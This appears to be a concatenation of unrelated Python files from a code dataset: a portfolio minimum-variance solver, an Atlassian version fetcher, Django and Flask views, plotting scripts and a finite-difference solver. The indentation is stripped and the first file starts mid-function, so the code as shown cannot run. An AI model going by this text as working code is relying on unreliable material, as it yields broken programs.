A = V_sqr @ B.T @ Omg @ B @ V_sqr
kappa, O = eigh(A)
O = np.fliplr(O)
G = B @ V_sqr @ O
# ensure positively oriented columns of G
signs = 1.0 * (G.T @ Omg @ ones < 0)
G = G * (1 - 2*signs)
gg = np.diag(G.T @ Omg @ G)
ge = G.T @ Omg @ ones
om_new = ge / (1 + gg)
it = it + 1
r = dict(ffp_it_ortho = it)
r.update(G = G)
r.update(omega = om_new)
r.update(kappa = kappa[::-1])
r.update(active_it_ortho = active_list)
return (r)
def lo_minvar():
ffpit = ffp(np.zeros(K))
theta = ffpit['theta']
w = np.maximum(0.0, ones - B @ theta) / svar
x = w / sum(w)
# run the same thing but by orthogonalizing the factors
ffpit_ortho= ffp_ortho()
chi = 1.0 * (w > 0)
Omg = np.diag(chi / svar)
# Largrange multiplier calculations
BTx = B.T @ x
G = ffpit_ortho['G']
GTx = G.T @ x
Oe = Omg @ ones
lam = (1 + BTx @ (B.T @ Oe)) / sum(Oe)
eta = (1 + GTx @ (G.T @ Oe)) / sum(Oe)
r = dict(x = x)
r.update(w = w)
r.update(chi_x = chi)
r.update(theta = theta)
r.update(lam = lam)
r.update(eta = eta)
r.update(G = G)
r.update(GTx = GTx)
r.update(BTx = BTx)
r.update(ffpit)
r.update(ffpit_ortho)
return (r)
def ls_numeric():
q = matrix (np.zeros(N), tc='d')
h = matrix (0.0, tc='d')
G = matrix(np.zeros(N), tc='d').trans()
A = matrix(np.ones(N), tc='d').trans()
b = matrix([1], tc='d')
sol = solvers.qp (matrix (2*Sigma),q,G,h,A,b)
w = [x for plist in np.asarray (sol['x']) for x in plist]
return np.asarray (w)
def lo_numeric():
q = matrix (np.zeros(N), tc='d')
h = matrix (np.zeros(N), tc='d')
G = matrix(-1.0 * IN, tc='d')
A = matrix(np.ones(N), tc='d').trans()
b = matrix([1], tc='d')
sol = solvers.qp (matrix (2*Sigma),q,G,h,A,b)
w = [x for plist in np.asarray (sol['x']) for x in plist]
return np.asarray (w)
xls = ls_numeric()
xlo = lo_numeric()
ls_var_numeric = xls @ (Sigma @ xls)
lo_var_numeric = xlo @ (Sigma @ xlo)
print("\nCVX Opt benchmarks:")
print(f"\nLS MinVar: {ls_var_numeric}")
print(f"LO MinVar: {lo_var_numeric}\n")
print(f"\nFFP (model seed {seed}).")
ls_mv = ls_minvar()
lo_mv = lo_minvar()
ls_var = ls_mv['x'] @ (Sigma @ ls_mv['x'])
lo_var = lo_mv['x'] @ (Sigma @ lo_mv['x'])
print(f"\nLS MinVar: {ls_var}")
print(f"LO MinVar: {lo_var}\n")
# indicator of long positions
chi = 1.0*(lo_mv['w'] > 0)
print(f"Long positions: {np.int(sum(chi))}\n")
domg = chi / svar
G = lo_mv['G']
omega = lo_mv['omega']
theta = lo_mv['theta']
kappa = lo_mv['kappa']
GG = (domg *G.T) @ G
gg = np.diag(GG)
if (min(omega) < 0):
print("****************************************")
print("* Warning! Negative omega encountered. *")
print("****************************************")
print("Passing correctness checks (above 1e-6 is concerning).\n")
print(f"LS check: {eucn(ls_mv['x']-xls)}")
print(f"LO check: {eucn(lo_mv['x']-xlo)}\n")
print(f"ortho check 1: {eucn(G @ omega - B @ theta)}")
print(f"ortho check 2: {eucn(gg - kappa)}")
print(f"ortho check 3: {eucn(GG-np.diag(gg))}")
print("\nFactor orientation info.")
print(f"\nB.T D_inv e = {np.round((B.T / svar) @ ones,1)}")
print(f"B.T Omega e = {np.round((domg * B.T) @ ones,1)}")
print(f"G.T D_inv e = {np.round((G.T / svar) @ ones,1)}")
print(f"G.T Omega e = {np.round((domg * G.T) @ ones,1)}\n")
print("FFP iterates info.\n")
print(f"FFP iterations: {lo_mv['ffp_it']}")
if (lo_mv['ffp_it'] != lo_mv['ffp_it_ortho']):
print("****************************************")
print("* Warning! FFP and FFP Othro mismatch. *")
print("****************************************")
for i in range(lo_mv['ffp_it']):
active = lo_mv['active_it'][i]
print(f" {len(active)} active positions at iteration {i+1}")
inter = np.intersect1d(active, lo_mv['active_it_ortho'][i])
if (len(inter) != len(active)):
print("***************************************")
print("* Warning! FFP vs FFP_ortho mismatch. *")
print("***************************************")
if (i > 0):
inter = np.intersect1d(active, lo_mv['active_it'][i-1])
if (len(inter) != len(lo_mv['active_it'][i-1])):
print(f"-- active set flipped at iteration {i+1}")
psi_at_fp = lo_mv['psi']
phi_at_fp = lo_mv['phi']
print(f"\n|phi - psi| = {eucn(psi_at_fp - phi_at_fp)}\n")
print("Theta/Omega.\n")
print(f"LS theta: {np.round(ls_mv['theta'],3)}")
print(f"LO theta: {np.round(lo_mv['theta'],3)}")
print(f"LS omega: <to be implemented>")
print(f"LO omega: {np.round(lo_mv['omega'],3)}\n")
print("Lagrange multpliers.\n")
print(f"B.T x: {np.round(lo_mv['BTx'],4)}")
print(f"lam : {np.round(lo_mv['lam'],4)}")
print(f"G.T x: {np.round(lo_mv['GTx'],4)}")
print(f"eta : {np.round(lo_mv['eta'],4)}")
if (lo_var > lo_var_numeric):
print("****************************************")
print("* Warning! Numerical minimum is lower. *")
print("****************************************")
print(f"lo_mv['x']: {lo_mv['x']}")
|
import sys
import urllib.request
import json
import re
known_supported_version = {
'jira-software': '8.13.8',
'confluence': '7.12.2',
'stash': '7.12.1',
}
def get_lts_version(argv):
product = argv[0].lower()
if product == 'jira':
product = 'jira-software'
elif product == 'bitbucket':
product = 'stash'
if product in known_supported_version:
url_archived = f"https://my.atlassian.com/download/feeds/archived/{product}.json"
url_current = f"https://my.atlassian.com/download/feeds/current/{product}.json"
try:
# load archived feeds
archive_feeds = urllib.request.urlopen(url_archived).read()
feeds = loadJSON(archive_feeds)
# load current feeds and append to archive
current_feeds = urllib.request.urlopen(url_current).read()
feeds += loadJSON(current_feeds)
# Filter all LTS versions and sort based on version
lts_versions = [x for x in feeds if x['edition'].lower() == 'enterprise']
sortedVersions = sorted(lts_versions, key=lambda k:cversion(k['version']), reverse=True)
if len(sortedVersions) > 0:
# Pick the latest LTS product version
lts_version = sortedVersions[0]['version']
else:
lts_version = known_supported_version[product]
# Currently latest lts version of Bitbucket and Confluence don't support K8s
# We use non-lts version of those products in the test
if cversion(lts_version) < cversion(known_supported_version[product]):
lts_version = known_supported_version[product]
except:
lts_version = known_supported_version[product]
lts_version = f"{lts_version}-jdk11"
else:
lts_version = 'unknown'
return lts_version
def loadJSON(fdata):
result = re.search("\[.*\]", fdata.decode("utf-8"))
if result is None:
return []
return json.loads(result.group(0))
def cversion(version):
# This method converts the version to a unified string to be used to sort and compare versions correctly
# E.g: '7.12.1' => '00007000120000100000'
# '7.3.19' => '00007000030001900000'
vers = version.split(".")
mapped_ver = ''
for i in range(max(len(vers)-1, 4)):
if len(vers) > i:
# Add zero on left side of version part and make a fixed size of 5 for each part
mapped_ver += vers[i].zfill(5)
else:
# Add '00000' if build/patch/minor part of version are missing
mapped_ver += '00000'
return mapped_ver
if __name__ == "__main__":
if len(sys.argv) > 1:
get_lts_version(sys.argv[1:])
|
from .glvq import GLVQ
from .deeplvq import DeepLVQ
from .gmlvq import GMLVQ
# from .knn import KNN
# from .lvq1 import LVQ1
from .lvqmln import LVQMLN
from .network import Network
__all__ = [
'GLVQ',
'DeepLVQ',
'GMLVQ',
# 'KNN',
# 'LVQ1',
'LVQMLN',
'Network',
]
|
import os
import random
import numpy as np
# import torch
def seed_everything(seed=42): # noqa D103 # TODO: Remove this ignore
random.seed(seed)
os.environ["PYTHONHASHSEED"] = str(seed)
np.random.seed(seed)
# torch.manual_seed(seed)
# torch.cuda.manual_seed_all(seed)
# torch.backends.cudnn.deterministic = True
# torch.backends.cudnn.benchmark = False
|
from flask_app import app
from flask import render_template, request, redirect, jsonify, session
from flask import flash
import requests
# class for User
class Author:
def __init__(self, id, contents):
self.id = id
self.contents = contents
# classmethods
# ==========================================================
# retrieve office character name
@classmethod
def getauthor(cls):
rawauthor = requests.get('https://officeapi.dev/api/characters/random')
words2 = rawauthor.json()
print(words2['data'])
endauthor = words2['data']
return endauthor
|
import random
from .serializers import NotionSerializer, NotionActionSerializer, NotionCreateSerializer
from rest_framework.response import Response
from rest_framework.decorators import api_view, permission_classes, authentication_classes
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAuthenticated
from django.conf import settings
from django.http import HttpResponse, Http404, JsonResponse
from django.shortcuts import render, redirect
from django.utils.http import is_safe_url
from .models import Notion
from .forms import NotionForm
ALLOWED_HOSTS = settings.ALLOWED_HOSTS
# Create your views here.
def home_view(request, *args, **kwargs):
return render(request, "pages/home.html", context={}, status=200)
@api_view(['POST']) # http method that the client has to send is === POST
@permission_classes([IsAuthenticated])
def notion_create_view(request, *args, **kwargs):
serializer = NotionCreateSerializer(data=request.POST)
if serializer.is_valid(raise_exception=True):
serializer.save(user=request.user)
return Response(serializer.data, status=201)
return Response({}, status=400)
@api_view(['GET']) # http method that the client has to send is === GET
# @authentication_classes([SessionAuthentication])
@permission_classes([IsAuthenticated])
def notion_list_view(request, *args, **kwargs):
qs = Notion.objects.all()
serializer = NotionSerializer(qs, many=True)
return Response(serializer.data)
@api_view(['GET']) # http method that the client has to send is === GET
def notion_detail_view(request, notion_id, *args, **kwargs):
qs = Notion.objects.filter(id=notion_id)
if not qs.exists():
return Response({}, status=404)
obj = qs.first()
serializer = NotionSerializer(obj)
return Response(serializer.data, status=200)
# http method that the client has to send is === GET
@api_view(['DELETE', 'POST'])
@permission_classes([IsAuthenticated])
def notion_delete_view(request, notion_id, *args, **kwargs):
qs = Notion.objects.filter(id=notion_id)
if not qs.exists():
return Response({}, status=404)
qs = qs.filter(user=request.user)
if not qs.exists():
return Response({"message": "You cannot delete this notion"}, status=401)
obj = qs.first()
obj.delete()
return Response({"message": "Notion deleted successfully"}, status=200)
# http method that the client has to send is === GET
@api_view(['POST'])
@permission_classes([IsAuthenticated])
def notion_action_view(request, *args, **kwargs):
'''
Action options: like, unlike and share
'''
serializer = NotionActionSerializer(data=request.data)
if serializer.is_valid(raise_exception=True):
data = serializer.validated_data
# print(data)
notion_id = data.get("id")
action = data.get("action")
content = data.get("content")
qs = Notion.objects.filter(id=notion_id)
if not qs.exists():
return Response({}, status=404)
obj = qs.first()
if action == "like":
obj.likes.add(request.user)
serializer = NotionSerializer(obj)
return Response(serializer.data, status=200)
elif action == "unlike":
obj.likes.remove(request.user)
serializer = NotionSerializer(obj)
return Response(serializer.data, status=200)
elif action == "share":
new_notion = Notion.objects.create(
user=request.user, parent=obj, content=content)
serializer = NotionSerializer(new_notion)
return Response(serializer.data, status=201)
return Response({}, status=200)
def notion_create_view_pure_django(request, *args, **kwargs):
user = request.user
if not request.user.is_authenticated:
user = None
if request.is_ajax():
return JsonResponse({}, status=401)
return redirect(settings.LOGIN_URL)
form = NotionForm(request.POST or None)
next_url = request.POST.get("next") or None
if form.is_valid():
obj = form.save(commit=False)
obj.user = request.user
obj.save()
if request.is_ajax():
# 201 == creatd items
return JsonResponse(obj.serialize(), status=201)
if next_url != None and is_safe_url(next_url, ALLOWED_HOSTS):
return redirect(next_url)
form = NotionForm()
if form.errors:
if request.is_ajax():
return JsonResponse(form.errors, status=400)
return render(request, 'components/form.html', context={"form": form})
def notion_list_view_pure_django(request, *args, **kwargs):
qs = Notion.objects.all()
notion_list = [x.serialize() for x in qs]
data = {
"isUser": False,
"response": notion_list,
}
return JsonResponse(data)
def notion_detail_view_pure_django(request, notion_id, *args, **kwargs):
data = {
"id": notion_id,
}
status = 200
try:
obj = Notion.objects.get(id=notion_id)
data['content'] = obj.content
except:
data['message'] = "Not Found"
status = 404
return JsonResponse(data, status=status)
# return HttpResponse(f"<h1>Hello, World! The notion id is {notion_id} - {obj.content}</h>")
|
# %%
import numpy as np
import pandas as pd
import git
# Find home directory for repo
repo = git.Repo("./", search_parent_directories=True)
homedir = repo.working_dir
# Import plotting features
import matplotlib.pyplot as plt
import seaborn as sns
# %%
# Set plot style
sns.set_style("ticks")
sns.set_palette("colorblind", color_codes=True)
sns.set_context("paper")
# load data
df_enzymes = pd.read_csv(f'{homedir}/data/processed/genetics/stab8_cursonetal_2018_tidy.csv')
df_enzymes.head()
# Plot boxplot with seaborn
#Define colors
colors = ['#E69F00','#56B4E9','#009E73','#F0E442','#0072B2','#D55E00','#CC79A7','#000000']
# Set custom color palette
sns.set_palette(sns.color_palette(colors))
#Make figure
fig = plt.figure(figsize=(2.95, 1.95), dpi=192)
#Make boxplot
ax=sns.boxplot(y='Reads_per_Kb_per_million_mapped_reads', x='Enzyme',
data=df_enzymes,
width=0.6,
linewidth=1)
#Rotate x tick marks
plt.xticks(rotation=30)
# add swarmplot
# bplot=sns.swarmplot(y='Reads_per_Kb_per_million_mapped_reads', x='Enzyme',
# data=df_enzymes,
# color='black',
# alpha=0.2)
#Set axes labels and limits
ax.set(xlabel='Gene', ylabel='Reads per Kb per \n million mapped reads')
ax.set_ylim(-5,125)
#Save figure
fig.savefig(f'{homedir}/figures/genetics/metatranscriptomics/stab8_curson2018_bact_boxp_rpkm.pdf', bbox_inches='tight')
# %%
|
import os, threading
class QtcFile(object):
def __init__(self, path, validator):
self._writer = FileWriter(path)
self._validator = validator
self._path = path
def write(self, path):
if self._validator.is_valid(path):
self._writer.write(path)
def remove(self, path):
if self._validator.is_valid(path):
self._writer.remove(path)
def update(self):
self._writer.process_caches()
class FileWriter(object):
def __init__(self, path):
if not os.path.isfile(path):
raise InvalidPathError('The file {} does not exist.'.format(str(path)))
self._path = path
self._write_cache = set()
self._remove_cache = set()
with open(self._path, 'w') as f:
f.truncate()
self._lock = threading.Lock()
def write(self, path):
self._lock.acquire()
self._write_cache.add(path)
self._lock.release()
def remove(self, path):
self._lock.acquire()
self._remove_cache.add(str(path))
self._lock.release()
def process_caches(self):
self._lock.acquire()
write_cache = self._write_cache.difference(self._remove_cache)
remove_cache = self._remove_cache.difference(self._write_cache)
self._write_cache = set()
self._remove_cache = set()
self._lock.release()
if len(write_cache) > 0 or len(remove_cache) > 0:
with open(self._path, 'r+') as f:
data = f.readlines()
f.seek(0)
for path in data:
stripped_path = path.strip('\n')
if stripped_path not in remove_cache:
f.write(path)
for path in write_cache:
f.write(path + '\n')
f.truncate()
class InvalidPathError(Exception):
def __init__(self, msg):
self.msg = msg
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
# making life easier
def l2hnorm(x, h):
return np.linalg.norm(x)*np.sqrt(h)
# Colelctors for convergence analysis
err = []
hs = []
#Choose here if you want to see the plots for h = 0.2
plot = False
#Choose here if you want to use the asymetrical domain
asym = True
# Creating a matrix for the symetrical case
def make_A(n):
L = np.diag((n-1)*[2],0)
L += np.diag((n-2)*[-1],1)
L += np.diag((n-2)*[-1],-1)
return L
# Creating a similar matrix for the asymetrical case
def make_A_asym(n):
L = np.diag((n-1)*[2.0],0)
L += np.diag((n-2)*[-1.0],1)
L += np.diag((n-2)*[-1.0],-1)
L[0,0] = 1
L[0,1] = -(2/3)
return L
for k in range(0,4):
# k refinement
h = 0.2/(2**k)
hs.append(h)
n = int(1/h)
# creating the domain and a finer domain for the exactg solution
omega = np.linspace(0,1, n+1)
omega2 = np.linspace(0,1, 100)
if asym:
omega = np.delete(omega, 1)
# Calling the proper matrix creation
A = make_A(n) if not asym else make_A_asym(n-1)
L = A/(h**2)
# exact solutions
fn1 = lambda x: -1/2*np.power(x,2)+3/2*x+1
fn2 = lambda x: -1*np.exp(x)+np.e*x+2
# inner points of the computational domain
wh = np.linspace(0+h, 1-h, n-1)
if asym:
wh = wh[1:]
# creating the boundary conditions
f1 = np.ones(wh.shape[0])
f1[0] += 1/h/h if not asym else 1/3/h/h
f1[-1] += 2/h/h
f2 = np.exp(wh)
f2[0] += 1/h/h if not asym else 1/3/h/h
f2[-1] += 2/h/h
# Solving the system
u1 = np.linalg.solve(L.copy(),f1)
u2 = np.linalg.solve(L.copy(),f2)
# inserting boundary conditions
u1 = np.insert(u1, 0, 1)
u1 = np.append(u1, 2)
u2 = np.insert(u2, 0, 1)
u2 = np.append(u2, 2)
# Plotting of the solution
if k==0 and plot:
print(L)
print(f1)
print(f2)
plt.plot(omega, u1, '-x', label="numerical")
plt.plot(omega2, fn1(omega2), label="analytical")
plt.legend()
plt.show()
plt.plot(omega, u2, '-x', label="numerical")
plt.plot(omega2, fn2(omega2), label="analytical")
plt.legend()
plt.show()
print(u1)
print(fn1(omega))
print(u2)
print(fn2(omega))
#Convergence analysis of u2
print(l2hnorm(u1-fn1(omega), h))
err.append(l2hnorm(u2-fn2(omega),h))
print(err[-1])
#FInding alphha and C
to_fit = lambda x,a,c: c*np.power(x,a)
fitted = curve_fit(to_fit, hs, err)[0]
print(fitted)
# Plotting Convergence analysis
plt.loglog(hs,err,'-x', label="Global Error")
plt.loglog(hs, to_fit(hs, *fitted), label="Fitted logarithmic function")
plt.legend()
plt.axis('equal')
plt.show()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.